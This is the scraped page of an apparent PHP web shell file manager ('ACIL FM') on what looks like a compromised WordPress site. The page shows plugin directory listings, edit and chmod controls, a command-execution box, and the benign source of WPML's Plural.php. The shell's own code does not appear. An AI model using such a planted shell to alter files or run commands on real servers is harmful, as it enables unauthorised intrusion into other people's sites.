ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site BKP/wp-content/plugins/wpml-string-translation/classes/MO
/
home
mhhtmff
www
site BKP
wp-content
plugins
wpml-string-translation
classes
MO
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
File
-
chmod
Open
Rename
Delete
Generate
-
chmod
Open
Rename
Delete
Hooks
-
chmod
Open
Rename
Delete
JustInTime
-
chmod
Open
Rename
Delete
Notice
-
chmod
Open
Rename
Delete
LoadedMODictionary.php
2.71 MB
chmod
View
DL
Edit
Rename
Delete
Plural.php
2.04 MB
chmod
View
DL
Edit
Rename
Delete
WPLocaleProxy.php
1.05 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site BKP/wp-content/plugins/wpml-string-translation/classes/MO/Plural.php
<?php namespace WPML\ST\MO; class Plural implements \IWPML_Backend_Action, \IWPML_Frontend_Action { public function add_hooks() { add_filter( 'ngettext', [ $this, 'handle_plural' ], 9, 5 ); add_filter( 'ngettext_with_context', [ $this, 'handle_plural_with_context' ], 9, 6 ); } /** * @param string $translation Translated text. * @param string $single The text to be used if the number is singular. * @param string $plural The text to be used if the number is plural. * @param string $number The number to compare against to use either the singular or plural form. * @param string $domain Text domain. Unique identifier for retrieving translated strings. * * @return string */ public function handle_plural( $translation, $single, $plural, $number, $domain ) { return $this->get_translation( $translation, $single, $plural, $number, function ( $original ) use ( $domain ) { return __( $original, $domain ); } ); } /** * @param string $translation Translated text. * @param string $single The text to be used if the number is singular. * @param string $plural The text to be used if the number is plural. * @param string $number The number to compare against to use either the singular or plural form. * @param string $context Context information for the translators. * @param string $domain Text domain. Unique identifier for retrieving translated strings. * * @return string */ public function handle_plural_with_context( $translation, $single, $plural, $number, $context, $domain ) { return $this->get_translation( $translation, $single, $plural, $number, function ( $original ) use ( $domain, $context ) { return _x( $original, $context, $domain ); } ); } private function get_translation( $translation, $single, $plural, $number, $callback ) { $original = (int) $number === 1 ? $single : $plural; $possible_translation = $callback( $original ); if ( $possible_translation !== $original ) { return $possible_translation; } return $translation; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply